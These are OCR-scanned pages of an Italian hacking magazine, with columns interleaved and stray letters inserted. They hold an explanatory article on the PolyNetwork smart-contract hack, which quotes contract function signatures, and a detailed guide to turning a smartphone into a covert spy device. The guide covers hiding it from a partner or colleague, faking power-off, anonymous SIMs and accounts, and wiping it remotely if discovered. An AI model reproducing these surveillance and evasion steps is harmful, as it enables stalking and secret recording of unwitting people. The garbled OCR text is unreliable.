disposizione la potenza di calcolo. qualcosa in cambio di qualcos’altro. Dal
momento che la blockchain è un database, potrà
EXCHANGE
sicuramente memorizzare queste informazioni.
ita

Un exchange è un cambio valute, che ovviamente esiste Non solo: siccome non è possibile modificarla
anche per quelle elettroniche. Il problema è che in genere a posteriori, i contratti che vengono memorizzati
si fanno pagare molto e sono imprevedibili, perché devono nella blockchain non possono essere violati
rivendere più volte. Quindi le soluzioni cross chain sono o messi in discussione. Sembra già una buona
considerate più economiche.
soluzione per evitare molti dei contenziosi che si
@

BUG BOUNTY vedono spesso nelle aule dei tribunali.

Si tratta di una ricompensa che le aziende danno ai pirati I CONTRATTI INTELLIGENTI

per invogliarli a rivelare i bug scoperti all’azienda stessa Ma a questo punto si può fare un ulteriore
invece di sfruttarli o renderli pubblici, così da avere
passo. Il contratto può infatti essere scritto
il tempo di correggerli.
con il classico linguaggio umano, come si
DEFI farebbe davanti a un notaio. Ma, visto che
siamo in un ambiente informatico, tanto vale
Acronimo di Finanza Decentralizzata. Si tratta di una scriverlo in un linguaggio di programmazione.
tipologia di sistema monetario informatico costruito Un apposito linguaggio di programmazione,
su blockchain pubbliche; il suo scopo è quello di trasformare
che viene interpretato da Virtual Machine
i prodotti finanziari in operazioni sicure e trasparenti
senza l’intervento di persone intermediarie. (un po’ come Java) che girano sulla rete
di Ethereum. Di fatto, un contratto è un
programma molto semplice, che prende dei

17
HACKTUALITÀ
LA TORRE DI BABELE
Naturalmente, Ethereum non
è l’unica piattaforma a offrire
questo servizio, e tutti i vari
concorrenti hanno una propria
moneta elettronica, ovviamente
incompatibile con le altre.
PolyNetwork si propone proprio

figura #1 di risolvere questo problema

e fare da ponte, unendo tutte

s
queste piattaforme in una sorta
Il processo di scrittura di una transazione proveniente da una
blockchain e diretto a un’altra. di “mercato unico”. In altre parole,
PolyNetwork permette di realizzare

ew
dati in input, applica delle condizioni, e fornisce un contratti usando diversi tipi di monete
output. In particolare, questo significa che i contratti (ben 11 completamente supportate, al momento in
sono automaticamente effettivi: una volta che lo cui scriviamo) consentendo agli utenti di sviluppare
smart contract è inserito nella blockchain, appena le le proprie applicazioni senza doversi preoccupare
condizioni previste dal programma sono verificate il di convertire le monete: è PolyNetwork a fare
blocco di codice viene eseguito, e quindi il contratto da traduttore. Diventa quindi davvero possibile
_n
viene automaticamente onorato. Non è quindi realizzare smart contract con quasi chiunque, un po’
proprio possibile per una delle due parti tirarsi come noi oggi possiamo comprare su eBay pagando
indietro senza il consenso dell’altra, perché in Euro una merce venduta in dollari canadesi.
l’esecuzione del codice è ormai al di fuori del suo Invece di avere 11 community separate, esiste
controllo. In Ethereum la moneta esiste come un’unica grande platea di persone che dialogano
lia

incentivo per convincere gli utenti a mettere liberamente, stabilendo contratti. Questa cosa
a disposizione la propria potenza computazionale è molto importante, perché spesso si desidera
(il “gas”, il carburante) per far girare le VM che condizionare l’esecuzione di uno smart contract
eseguono i programmi (gli smart contract). al successo di un altro smart contract presente
Chi realizza un contratto, infatti, “paga” l’utilizzo su una piattaforma diversa (e vincolato
ita

della rete con le monete Eth, distribuite agli utenti a una moneta elettronica differente).
che hanno permesso l’esecuzione del contratto
sui loro computer. LA GIUSTA SOLUZIONE
Per semplificare il funzionamento,
PolyNetwork utilizza una propria
@

blockchain come livello di astrazione

(livello 0) per tutte le altre blockchain,
traducendo i propri token (le monete
elettroniche) nei token delle altre
blockchain e viceversa. Le operazioni
sulle varie blockchain di livello 1
vengono quindi eseguite da
PolyNetwork per conto degli utenti
(mantenendo una commissione
sulle conversioni), rendendo
figura #2 il processo perfettamente
trasparente per gli utenti. La
Per risalire alle transazioni cross-chain si fa il percorso della domanda ovvia, a questo punto, è: come
scrittura, ma al contrario. sono gestiti i permessi di esecuzione

18
 POLYNETWORK
Curve Finance in realtà altri smart contract legati all’entità
(https://curve.fi) che gestisce PolyNetwork. Il punto debole
è una delle più grandi dell’infrastruttura sono quindi questi smart
piattaforma DeFi contract intermedi A e B (vedi box Come
(finanza decentralizzata) funzionano gli smart contract su
con sede in Svizzera, PolyNetwork), che sono di per sé stessi
che permette lo scambio autorizzati a spostare grandi quantità di monete
di stablecoin di ogni elettroniche. Da notare che l’esempio che
tipo, con il minor abbiamo fatto parla solamente dello
slippage spostamento di risorse, ma in realtà gli smart
possibile.

s
contract di “servizio” sono molti e possono
gestire tanti aspetti differenti dell’infrastruttura.

ew
L’HACK SCOPERTO
degli smart contract? Se vogliamo eseguire Un pirata non meglio identificato è riuscito a
programmi su un computer abbiamo diversi utenti ottenere il controllo di alcuni smart contract di
di sistema, e come minimo un utente semplice servizio. Nello specifico, si tratta dei contratti
non può fare cose che sono invece permesse a un EthCrossChainData ed EthCrossChainManager,
amministratore. Sulle blockchain che implementano pubblicati su GitHub. Il primo è responsabile di
_n
gli smart contract, l’esecuzione di un contratto impostare le chiavi pubbliche dei Keeper, i nodi
è vincolata alla firma digitale del suo “proprietario” della rete che si occupano di gestire i portafogli
e deve essere accettata da tutta la rete (il “consenso”). delle reti di livello 1. Chiamando la funzione
Il fatto è che un contratto può avere come
proprietario un altro contratto, rendendo quindi function putCurEpochConPubKeyBytes(bytes
lia

il sistema più flessibile. Usando questo meccanismo memory curEpochPkBytes) public

è infatti possibile avere di fatto come proprietari di un whenNotPaused onlyOwner returns (bool)
contratto diversi utenti e se non sono tutti d’accordo il
programma non viene eseguito. Il consenso della rete si può impostare la propria chiave e diventare
serve comunque a impedire che qualcuno possa Keeper, avendo quindi libero accesso
ita

innescare l’esecuzione di un contratto senza essere il ai portafogli Bitcoin, Ethereum, eccetera,

proprietario, perché gli altri nodi non accetterebbero trasferendo enormi somme di cryptovalute
di applicare le modifiche alla blockchain. Questo a qualsiasi wallet a propria discrezione.
significa che i vari contratti sviluppati su PolyNetwork Naturalmente, in teoria questo smart contract
hanno una serie di proprietari “fittizi”, che sono dovrebbe poter essere utilizzato solo da utenti
@

autorizzati. Lo smart contract

figura #3 EthCrossChainManager, invece, ha
l’autorizzazione per inviare messaggi da una
delle blockchain di livello 1 a PolyChain (la
catena di livello 0). Per il funzionamento di
PolyChain, significa che utilizzando la funzione

function verifyHeaderAndExecuteTx(bytes
memory proof, bytes memory rawHeader,
bytes memory headerProof, bytes memory
curRawHeader,bytes memory headerSig)
Per correre ai ripari, PolyNetwork ha messo
in palio bug bounty da 100 mila dollari. whenNotPaused public returns (bool)
Solo un dettaglio: saranno pagati in valuta
Ethereum, non in “veri” USD. si ordina una transazione e si innesca

19
HACKTUALITÀ
Il furto di cryptovaluta ha generato
una notevole pubblicità negativa,
tanto che ne hanno parlato
anche testate generaliste
come Time e CNBC.

figura #4

s
l’esecuzione di un qualunque smart contract richiesto una transazione da Ethereum a PolyChain,

ew
di PolyNetwork. A questo punto si nota il primo chiamando lo smart contract EthCrossChainManager
problema: EthCrossChainManager è il proprietario e fornendo la stringa calcolata come _method oltre
di EthCrossChainData, quindi è autorizzato a alla chiave pubblica di un proprio wallet Ethereum.
eseguire questo secondo contratto. In altre parole, Questo ha innescato EthCrossChainManager,
se si riesce a prendere il controllo di chiamando la funzione
EthCrossChainManager diventa possibile putCurEpochConPubKeyBytes di EthCrossChainData
_n
trasformarsi in Keeper e spostare qualsiasi somma la quale imposta la chiave pubblica fornita come
di cryptovalute dai wallet di PolyNetwork ai propri. Keeper. Naturalmente, EthCrossChainData esegue il
La domanda è: come si prende il controllo di questo comando perché lo smart contract
smart contract? Ovviamente c’è un meccanismo di EthCrossChainManager è il suo proprietario e l’hash
sicurezza, ma non era abbastanza sicuro. Questo della funzione combacia. Ora il pirata ha già tutto
lia

smart contract non eseguirebbe una funzione quello che gli serve: deve solo utilizzare la sua chiave
qualsiasi del contratto chiamato, ma solo una privata per spostare cryptovalute dal wallet
funzione il cui ID (una stringa da 32 bit) può essere Ethereum sul livello 1 di PolyNetwork al proprio
verificato con questa funzione crittografica: wallet personale Ethereum. E poi ha ripetuto la
stessa procedura per altre tipologie di wallet nella
ita

(success, returnData) = _toContract.call(abi. disponibilità di PolyNetwork: Binance e Tether, per

encodePacked(bytes4(keccak256(abi. esempio. Questo meccanismo ha permesso al pirata
encodePacked(_method, di spostare una quantità di cryptovalute il cui valore
"(bytes,bytes,uint64)"))), abi.encode(_args, in dollari si aggira intorno ai 610 milioni.
Dalle poche indiscrezioni di PolyNetwork, pare che
@

_fromContractAddr, _fromChainId)));
sia riuscito a utilizzare un crypto exchange da
Però c’è un problema: la stringa _method è definita qualche parte in Asia per condurre le operazioni.
dall’utente, quindi è possibile fare il brute forcing di
una stringa di quel tipo il cui hash a 32 bit sia ENTITÀ DELLA VULNERABILITÀ
esattamente l’ID della funzione di Appena PolyNetwork si è accorta del furto ha chiesto
EthCrossChainData che consente a un utente di alle varie blockchain di bloccare le transazioni.
diventare Keeper. In altre parole, il pirata ha prima La cosa è stata possibile solo per Tether (per circa
di tutto calcolato l’hash della funzione il 5% del valore totale spostato dal criminale),
putCurEpochConPubKeyBytes di EthCrossChainData. perché le altre blockchain avevano già approvato
Poi ha iniziato il brute force di una stringa da fornire le transazioni. Questa vulnerabilità ha causato un
a EthCrossChainManager come _method. Da quello danno economico importante all’organizzazione di
che si vede analizzando i messaggi passati sulla rete PolyNetwork, mitigato solo dal fatto che i fondi sono
di PolyNetwork, sembra che abbia utilizzato la stati restituiti. Per fortuna gli utenti non hanno perso
stringa f1121318093. A questo punto, il pirata ha le loro risorse, perché le valute spostate erano

20
 POLYNETWORK
SOLUZIONE DIFFICILE
GLI SMART
COME FUNZIONANO Proprio a causa della natura della blockchain,
ETWORK
CONTRACT SU POLYN
non esiste una vera soluzione: il problema
è stato risolto dalla “redenzione” del pirata,
che ha restituito quasi interamente le
cryptovalute trafugate. La redenzione
Possiamo riassumere la dinamica di funzionamento
è probabilmente dovuta al tentativo di uscire
di PolyNetwork e dei suoi contratti in questo modo:
quanto più pulito possibile dalla vicenda.
1 un utente crea uno smart contract su PolyNetwork, Anche perché, tentando di ricostruire gli
per spostare fondi da Ethereum a Bitcoin; spostamenti delle cryptovalute, si vede che c’è

s
2 PolyNetwork recupera un proprio smart contract
stato un tentativo di riciclaggio del denaro su
https://curve.fi, che non indica esattamente
preesistente “A” da Ethereum;
una persona che voglia accontentarsi di un

ew
3 PolyNetwork recupera un proprio smart contract Proof of Concept. Per il resto, PolyNetwork
ha attivato un bug bounty program per
preesistente “B” verso Bitcoin;

4
invogliare futuri pirati a contribuire alla
PolyNetwork sviluppa un contratto “C” per spostare sicurezza del sistema. E, del resto, hanno
fondi da Ethereum a sé stessa, usando come cercato di correggere il bug in questione
proprietario il contratto “A”;
aumentando la difficoltà di calcolare l’hash
_n
5 PolyNetwork sviluppa un contratto “D” per spostare della funzione in EthCrossChainData. Rimane
il fatto che, se le blockchain sono in linea di
fondi da sé stessa a Bitcoin, usando come proprietario “B”;

6 PolyNetwork innesca l’attuazione della

massima Open Source e protette dalla regola
del consenso, spesso i servizi disponibili
catena di contratti. online hanno alcuni punti non chiari, che
lia

potrebbero nascondere vulnerabilità difficili

da prevedere. E per questo probabilmente
in realtà di PolyNetwork. L’immagine non esisterà mai una soluzione, perché la
di questo servizio, però, ha subito comodità di un livello di astrazione gestito
un grave colpo, ed è difficile capire da un servizio Web comporterà sempre la
ita

quanto questo influenzerà rinuncia a un certo grado di sicurezza.

il successo di un servizio che si
proponeva proprio di essere una
alternativa più sicura alle normali
contrattazioni cartacee. Sempre
@

in termini di sicurezza, questo caso

ha reso evidente anche al grande
pubblico un dettaglio fondamentale:
nelle transazioni su blockchain non
si torna indietro. Se ci viene rubata
la carta di credito, possiamo fare una
denuncia e le aziende che gestiscono

figura #5
le transazioni possono restituirci
il denaro che è stato speso dai
criminali. Se ci vengono sottratte
delle cryptovalute, perché la chiave Il sito Curve Finance (https://curve.fi/) in poco tempo è diventato
privata non era custodita punto di riferimento nel mondo della blockchain grazie soprattutto
correttamente, quelle somme sono alla sua capacità di offrire ottimi tassi di cambio per le stablecoin
perse per sempre. e di consentire il collegamento di varie piattaforme DeFi.

21
hackerjournal.it

s
ew
_n
lia

Il punto di riferimento per chi fa dell’hacking

una filosofia di vita
ita

La crew di Hacker Journal ti aspetta ogni giorno sul suo nuovo sito Web, il ritrovo della sua ricca comunità
hacker. Troverai anticipazioni degli articoli, news dal mondo della (in)sicurezza, contest, offerte speciali e
un forum che vuole essere il punto di riferimento per chiunque voglia diventare un esperto di sicurezza.
In un periodo storico in cui governi e multinazionali si divertono a spiare tutto e tutti, sulle
pagine della rivista e sul suo sito scoprirai come difenderti e contrattaccare. #HJisBACK
@

Scopri il sito e la comunità di Hacker Journal

Forum: iscriviti subito e inizia a dialogare con la redazione e la comunità di HJ
• News: le ultime notizie su cyberintrusioni, furti
di credenziali, bug, malware e altro ancora
• Contest: metti alla prova le tue conoscenze
con i giochi e le sfide della redazione
• Collezione HJ: i vecchi numeri della rivista,
in PDF, da scaricare
• Invia un articolo: ti piace scrivere e hai un’idea
originale per un articolo? Inviacela e la valuteremo!
 s
ew
_n
lia

SICUREZZA
ita

spionaggio
@

Cosi ti spio dal cellulare

C’è chi, con l’aiuto distorto di app al 100% legali, trasforma qualunque
smartphone in gadget spia........................................................................................................ 24

pentesting Attacco a dizionario!

Imparerete a portare avanti un dictionary attack contro Mutillidae............................... 32

Virtual machine Reti virtuali in azione

Scoprite tutte le potenzialità della virtualizzazione............................................................ 40
SICUREZZA

s
,
Cosi ti spio
dal cellulare!
ew
_n
orto di ap p 100% lega li, trasforma
C’è chi, con l’aiuto dist
dget spia per catturare,
lia

qu e sm artpho ne in ga
qualun ns aputa di tutti i presenti
video e au dio all’i
in tempo reale,

S
ì, hai letto bene: c’è chi dei casi sono nate per svolgere
ita

sfrutta applicazioni funzionalità utilissime, come

ideate per tutt’altre la videosorveglianza. Tuttavia,
finalità per compiere la fantasia e l’inventiva distorta
azioni quanto meno illecite, come di qualcuno fanno sì che le
spiare un amico, la propria funzionalità vengano capovolte.
@

ragazza... Trasforma, in pratica, In questo approfondimento

uno smartphone in un gadget- vogliamo mostrarvi quello
spia capace di catturare audio che ci ha illustrato la nostra fonte
e video in tempo reale e segreta e come sia possibile
trasmetterli via Web. trasformare un normale
telefonino in un vero e proprio
CAMBIO DI DESTINAZIONE dispositivo spia
Vi state chiedendo come sia
possibile tutto ciò e perché DA TOOL DI SORVEGLIANZA
determinate app consentano A MICROSPIA
di farlo? Beh, la risposta è L’app che utilizzeremo è uno stru-
semplice: le app in questione non mento nato appunto per la vide-
hanno colpe, anzi, nella osor veglianza, AtHome Camera
stragrande maggioranza (trovate il link per scaricarla nel

24
 SPIONAGGIO
box qui in basso, assieme a quelli
degli altri software che userete)
un’applicazione che consente di
PREPARAZIONE
visualizzare via Internet (tramite
la fotocamera di uno smartphone)
DEL SISTEMA SPIA
ciò che accade in un ambiente. Un Ancor prima d’installare le app, chi ha intenzione di creare
software che si usa, per esempio, un gadget spia deve seguire tutta una serie di accortezze
quando si parte per le vacanze al indispensabili per una buona riuscita dell’operazione.
fine di controllare ciò che avviene
in casa. Uno strumento utile, ma Per trasformare uno smartphone Una SIM nuova
che – come vedrete – può essere in un “perfetto” cellulare spia, Sempre al fine di prevenire

s
usato per spiare qualcuno a sua è necessario che chi si cimenta ogni possibile
in queste attività prenda alcune riconoscimento, chi prepara
totale insaputa. Prima di lasciarvi dovute accortezze. Per fare un il dispositivo deve utilizzare una
alla descrizione di come avven-

ew
esempio, dovrà chiedersi come scheda non riconducibile a lui.
gono determinate trasformazio- alimentare il dispositivo. Questo Per fare ciò, spesso si fa uso
ni, vi vogliamo ricordare, a ogni potrebbe essere risolto lasciando di SIM anonime comprate online.
banalmente il telefono allacciato alla Nel momento in cui scriviamo,
buon conto, che spiare qualcuno
corrente: così, agli occhi della vittima, infatti, cercando su noti siti
è un reato! Dunque, considerate lo smartphone sembrerà un normale di vendite online, ne abbiamo
questa guida come una semplice cellulare sotto carica. Oppure, individuate diverse.
descrizione di come operano de- se il collegamento alla corrente non
_n
è possibile, potrebbe utilizzare un Wi-Fi e
terminati soggetti e non fatevi
power bank. Un altro aspetto che Bluetooth?
venire strane idee... il malintenzionato deve considerare Un’altra accortezza
è la possibilità che la persona spiata è quella di disattivare le connessioni
si accorga del telefono e tenti di che consentono di rintracciare
COSA CI sbloccare il display. Questo viene il dispositivo, come Wi-Fi e Bluetooth.
lia

risolto ingannando la vittima con un

OCCORRE
Se il telefono è connesso a una rete
finto spegnimento. In altre parole, Wi-Fi, anche semplicemente
sfruttando una funzione dell’app collegandosi al pannello
APP SERVER Cerberus che oscura lo schermo di amministrazione del router,
ATHOME VIDEO STREAMER del telefonino e lo rende tale e quale risulta visibile. Stessa cosa dicasi
a un cellulare spento. Altre per il Bluetooth, che concede
ita

Android: http://bit.ly/andathomevs fondamentali accortezze? Eccole: l’individuazione del cellulare

iOS: http://bit.ly/iosathomevs con una semplice ricerca
PC: http://bit.ly/winathomevs Un bel reset da un altro dispositivo.
L’ideale è utilizzare
APP CLIENT un telefonino nuovo. Il GPS acceso
ATHOME CAMERA Immacolato. Ma se proprio non si Il rilevatore GPS deve essere
@

può, chi si appresta a compiere tali lasciato acceso, così da

Android: http://bit.ly/andathomec operazioni dovrebbe fare un reset poter individuare la posizione del
iOS: http://bit.ly/iosathomec hardware e software, al fine di telefono da remoto. Se per esempio
PC: http://bit.ly/winathomec cancellare ogni traccia. In caso il gadget spia venisse messo in auto
venisse scoperto, infatti, è necessario o infilato in una borsetta, sarebbe
Quanto costa: gratuito
che non vi siano dati all’interno utile per chi spia sapere dove si trova
Sito Internet:
http://bit.ly/sitoichano del dispositivo. il suo cellulare. Senza considerare
la possibilità di resettare da remoto
PIN sì o PIN no? nel caso si venisse scoperti.
CONTROLLO REMOTO
Sul telefonino dovrebbe
SMARTPHONE
essere impostato un PIN Un occhio
CERBERUS APP
(meglio noto come codice di blocco), ai volumi
un’ulteriore garanzia di protezione. Risulta quasi inutile dire che
Quanto costa: 5 €/anno
per 1 dispositivo E allo stesso tempo, dovrebbe essere tutti i volumi devono essere azzerati
Sito Internet: rimosso il codice PIN dalla scheda (suoneria, notifiche, sveglia...),
http://bit.ly/sitocerberus SIM per evitare intralci con le altre così come deve essere rimossa
Note: in versione trial è possibile app che si usano per lo scopo. completamente la vibrazione.
usare l’app per 7 giorni

25
SICUREZZA

Un nuovo indirizzo Gmail AtHome

Camera:
per ”anonimizzarsi meglio”
il centro di
controllo dello
Un account Google porta con sé si venisse scoperti. Ecco perché
tutta una serie di informazioni che chi si appresta a compiere tale gesto

spyphone
è indispensabile nascondere se non utilizza un indirizzo email creato
si vuole incappare in guai peggiori appositamente. Operazione che,
delle conseguenze di non poter più praticamente, si porta a termine
spiare qualcuno! Creare un nuovo in pochi minuti. Le informazioni
account è dunque obbligatorio per che Google richiede per farlo

s
il furbetto spione, non solo perché sono essenziali. L’unica nota
1 2 3
consente di utilizzare il dispositivo stonata potrebbe essere il dover
in ogni sua funzione, ma anche inserire un numero di telefono,

ew
perché permette di rintracciare ma online si può sempre comprare
14
e/o resettare il cellulare nel caso una scheda anonima.

3
_n
lia

Bastano pochi e semplici passi per creare un nuovo account Gmail.

E c’è chi usa un proxy per registrare un indirizzo email irrintracciabile.
16

Colleghiamo il server (streamer) e il client

ita

Il funzionamento dell’app è semplice: bisogna installare il server sullo smartphone che fungerà
da microspia e un’altra app/software client sul sistema che dovrà controllare la microspia.

Lo streamer
@

sullo smartphone
Dallo smartphone che userete da telecamera
spia, si entra nel Play Store di Google e si
cerca AtHome Video Streamer. Si esegue
l’installazione e
si aspetta
qualche
secondo. Poi, si
tappa su Apri.
AtHome Camera sul Il software sul PC
Il telefono
chiederà una
dispositivo mobile A questo punto, dal PC che si userà per spiare
serie di permessi Sempre dallo stesso smartphone, si procede le immagini prese dallo smartphone, ci si
che bisogna all’installazione di AtHome Camera casa collega al sito ufficiale dell’applicazione
concedere; sicurezza: l’app è contrassegnata da una http://bit.ly/sitoichano e si entra nella sezione
l’ultimo è la casetta rossa, mentre la streamer da una blu. Download. Dalla sezione AtHome Camera
possibilità Durante l’installazione, che dura sempre pochi App si sceglie la versione per Windows e si
di poter bloccare secondi, si concedono i permessi e poi si scarica il software. Fatto ciò, si scompatta il file
lo schermo. approda alla schermata principale. e si lancia l’installazione con un doppio clic.

26
 SPIONAGGIO
La versione gratuita 1 ADD CAMERA 9 FLASH
Permette di aggiungere un dispositivo Cliccando qui si attiva la torcia dello
di AtHome Camera che si vuole monitorare. Per ciascuno, smartphone, utile per illuminare
verrà richiesto l’inserimento di CID, l’ambiente controllato.
offre molte user e password. 10 CAMERA SWITCH
2 MY ACCOUNT Permette di cambiare fotocamera
funzionalità, Si può effettuare il logout del programma. di ripresa (frontale/posteriore).
3 SETTINGS 11 NIGHTVIEW
accessibili dalla La scheda dedicata alle impostazioni Per attivare o disattivare la visione
del software. Si possono definire notturna.
schermata principale i parametri audio e video, il microfono 12 QUALITÀ
da utilizzare e il layout di visualizzazione Pulsante che consente di selezionare
che l’app può memorizzare. la qualità della risoluzione: Low, Good
4 TELECAMERE e High (quest’ultima è disponibile solo

s
13
15
In questa colonna sono riportate le per la versione premium).
camere aggiunte al programma. Cliccando 13 VIEW
sugli ingranaggi di ciascuna camera Da questo piccolo pannello è possibile

ew
è possibile impostare i parametri di login, scegliere la visualizzazione che si
la risoluzione, il nome da impostare preferisce: a schermo intero, diviso
allo streamer, ecc. a quattro, una camera principale e le altre
5 MUTE di contorno e così via.
Questo pulsante è destinato 14 LIVELLO BATTERIA
all’attivazione/disattivazione dell’audio. Questo è l’indicatore della batteria dello
6 MIC smartphone.
Serve per attivare o disattivare 15 SCHEDE EXTRA
_n
il microfono sullo smartphone. Schede che consentono di rivedere i video
7 VIDEOREC dell’Alert Video, della programmazione di
Consente di avviare la registrazione. Il file registrazione e di quelli registrati e salvati
salvato in formato MP4 sarà contenuto sul PC.
nella cartella C:\Users\Nomeutente\ 16 TAB VIDEO
Videos\AtHome Camera\ o in quella Queste schede consentono di cambiare
che si può impostare dai settaggi visualizzazione delle camere.
lia

del software.
5 7 9 11
8 SCREENSHOT
Questo pulsante consente di catturare
6 8 10 12
uno screenshot.
ita
@

Qualche configurazione... ...ma basta un QR Code E sul PC si vede la cam!

Si accettano i termini d’uso, si clicca su Next Sulla schermata del PC si clicca su QR Code Dal PC, si clicca su Add Camera e si inseriscono
per quattro volte e si lancia l’installazione. Login e si inquadra il codice con il lettore del i dati riportati sul telefono: Camera CID,
Infine, apparirà la schermata che chiede telefono. Si apre la home del programma. A Username e Password. Cliccando su OK, il
l’inserimento di username e password. Si questo punto, sullo smartphone, si chiude dispositivo spia apparirà nella lista delle
riprende in mano il telefono-spia e si avvia AtHome Camera App e si avvia AtHome camere, in alto a sinistra. Non resta ora che
AtHome Camera App. Si tappa sul simbolo + e Camera Streamer. Si è pronti ora per collegare cliccare su Select a camera e selezionare di
su Add Camera by QR Code. i due dispositivi. nuovo OK.

27
SICUREZZA

Videoregistrare a orari specifici

L’app AtHome Camera permette anche di impostare degli orari prestabiliti in cui avviare
la videoregistrazione: scopriamo insieme come lo spione tecnologico pianifica il “monitoraggio”.

s
ew
“Schedulare” A che ora? I video li trovate qui
Per programmare una registrazione si deve Nella sezione centrale Scheduled Recording I video registrati attraverso la modalità
avviare il software installato sul PC e, una Settings bisogna ora impostare le opzioni di programmazione saranno disponibili nella
volta aggiunta la camera, cliccare, nella di registrazione: in altre parole si devono scheda della home, Scheduled Recording.
colonna sinistra, sull’ingranaggio del scegliere i giorni e gli orari in cui il software Per visionarli sarà sufficiente cercare
_n
dispositivo che si vuole adoperare. Fatto ciò, deve avviare e terminare le riprese. e selezionare il video interessato (dalla colonna
non si deve far altro che entrare sulla Poi, si spunta il flag Enable e infine si clicca destra) e cliccare sul pulsante Play presente
scheda Scheduled Recording. sul pulsante Save. in basso a sinistra.

Cerberus: così lo smartphone

spia è davvero perfetto!
lia

Un’app nata per la sicurezza del cellulare che, senza

volerlo, aiuta i malintenzionati a nascondersi meglio.
ita

P
rincipalmente è il far apparire funzionalità di protezione: dalla
un telefonino come spento possibilità di comandare un
che spinge, chi spia, telefono via Internet al controllo
a installare anche Cerberus remoto via SMS e dalla
oltre all’applicazione di localizzazione di un dispositivo
videosorveglianza. Già, perché alla possibilità di fare dei backup.
@

grazie a quest’app si ha la
possibilità di “spegnere” il display. Come funziona?
Ciò farà in modo che il dispositivo Si scarica, si installa e si crea un
appaia del tutto nero agli occhi account. Poi, al termine del periodo
dell'ignara vittima. Chi di prova (che dura 7 giorni),
eventualmente lo afferrerà e/o si può sottoscrivere un piano
premerà sul tasto d’accensione per di abbonamento (si parte da un
attivare lo schermo, si ritroverà in minimo di 5 euro all’anno per la
mano un telefono chiuso, lasciato gestione di un solo dispositivo).
lì magari dalla moglie, dal marito Per attivare la funzione di
o dal collega. “oscuramento”, non si deve far altro Attivando “Finto Spegnimento”,
Cerberus in realtà è un’app di che selezionare l’apposita voce nessuno riuscirà a scoprire
sicurezza, un antifurto che si può presente nella home del che lo smartphone spia è in realtà
acceso e sta registrando.
scaricare dal sito ufficiale http://bit. programma e scegliere tra le
ly/sitocerberus e promette ai suoi opzioni disponibili. Niente di
acquirenti (è a pagamento) diverse complesso.

28
 SPIONAGGIO

s
QUALE TARIFFA TELEFONICA PER UNO SPYPHONE?

ew
U
n aspetto importate a cui ci sono. Va da sé che la soluzione usata Giga 100, che prevede 100 Giga,
bisogna prestare attenzione dagli spioni tecnologici è quella di appunto, a 9,99 euro al mese. Ma anche
quando il pirata si cimenta scegliere una tariffa flat, ovvero un Poste Mobile offre una tariffa simile
in attività come quella di spiare piano che preveda un esborso fisso (si chiama Promo Creami Relax 100
qualcuno tramite un telefonino, mensile senza ulteriori spese per i dati. e costa 10 euro al mese), così come
è senza dubbio quella che riguarda Il telefono, in pratica, deve rimanere Very Mobile, Kena, ho e tutti gli altri
_n
le tariffe. Stiamo parlando, nello collegato a Internet e i file che potrebbe operatori. La scelta finale,
specifico, di due particolari tipologie inviare potrebbero anche essere riassumendo, al di là della compagnia
di importi. Anche se di un’app come numerosi. Quindi, si sceglie una telefonica, dovrebbe ricadere su una
Cerberus, infatti, se ne potrebbe pure soluzione “tutto compreso”. tariffa che preveda un buon numero
fare a meno (visto che per sette giorni Naturalmente, nella scelta, bisogna di Giga e un costo mensile basso.
la si ha a disposizione gratuitamente) concentrarsi sui Giga di navigazione, Ovviamente, gli spioni-informatici
e che AtHome Camera offre sì degli visto che chiamate e SMS non si procureranno delle schede anonimie
lia

strumenti avanzati nella sua versione interessano poi tanto. Nel momento in e soprattutto non intestate: date
premium ma che non sono cui scriviamo di tariffe del genere ce ne uno sguardo su http://bit.ly/
indispensabili al progetto, i costi da sono diverse. Per i nostri test abbiamo schedetelefonichenonintestate
pagare per il piano tariffario della SIM utilizzato una scheda Iliad con il piano per scoprirne di più.
ita

Videoregistrare a orari specifici

L’app AtHome Camera permette anche di impostare degli orari prestabiliti in cui avviare
la videoregistrazione: scopriamo insieme come lo spione tecnologico pianifica il “monitoraggio”.
@

Smartphone remoto Che faccio, resetto? Sì, sì, reset!

Visto che si usa un dispositivo Android e che Nella colonna si trovano i dispositivi collegati Un ultimo avviso ricorda che tutti i dati
si è effettuato l’accesso mediante un account all’account che si è utilizzato per impostare verranno cancellati definitivamente dal
Google, nel caso si venisse beccati a spiare, il telefono spia. Basta sceglierlo e cliccare sulla dispositivo. Dopo aver resettato il dispositivo,
si può sempre resettare il telefono. Per farlo, linguetta RESETTA DISPOSITIVO. non riuscirete più a localizzarlo. Se il dispositivo
la prima operazione da compiere, è quella Sono presenti anche l’opzione RIPRODUCI è offline, il reset inizierà quando tornerà
di collegarsi all’indirizzo http://bit.ly/ AUDIO (in caso di smarrimento) e BLOCCA IL online. Non resta che cliccare su RESETTA
trovailmiotelefono. DISPOSITIVO. DISPOSITIVO e amen!

29
SICUREZZA
IL TELEFONO DELL’HACKER
Oltre alle app utilizzate in maniera non appropriata, ci sono tanti altri
strumenti che consentono di creare un perfetto gadget spia.

L’
essenziale non basta più. difficile. Ma non impossibile! Già, software e di specifici hardware.
Sono tanti gli aspetti che perché per ogni antivirus, per ogni In queste pagine abbiamo appunto
chi si cimenta in attività sistema di protezione, per ogni descritto alcuni dei software/app
di “spionaggio” deve barriera, c’è sempre chi riesce a più adoperati dagli cracker per
considerare se non vuole essere trovare un metodo per aggirare compiere incursioni o attività, a
beccato alla prima occasione, visto l’ostacolo... Gli basta saper cercare volte, poco ortodosse. Sempre
che con gli strumenti che sono nei posti giusti e capire bene mediante l’uso dello smartphone.

s
disponibili oggi, è sempre più il funzionamento di determinati Iniziamo dalla parte software.

ew
Naviga in anonimato, anche da mobile!
Mai sentito parlare di VPN? Beh, Facile intuire perché chi si cimenta
è uno strumento che consente di nell’attività di spiare qualcun altro
celare il proprio indirizzo IP, coprire utilizzi spesso sistemi del genere.
la posizione e la vera identità Come ogni cosa ormai, su Internet
_n
dell’utente che lo usa. Detto in altre di VPN se ne trovano tante: alcune
parole, usando un servizio VPN si a pagamento altre completamente
nasconde al server che ospita un gratuite. Per il “telefonino
sito, per esempio, l’identità del dell’hacker” è ovviamente preferibile
visitatore dello stesso portale. Nello utilizzare un’app. Eccone alcune che
specifico, questo occultamento si possono essere utilizzate senza
ottiene mediante una cifratura spendere un euro:
lia

(detta “tunnel”) che si crea tra il • Windscribe – è un’app Android

telefonino/PC che si collega al Web facile da utilizzare che offre 10 GB
e il server che offre il servizio VPN. di dati gratuiti.
Mentre si utilizza Internet, in soldoni, https://ita.windscribe.com/
il servizio VPN si frappone tra i due, • PrivateVPN – è utilizzabile
ita

creando una connessione sicura. gratuitamente per un periodo

I dati, a questo punto, vengono di prova di 7 giorni.
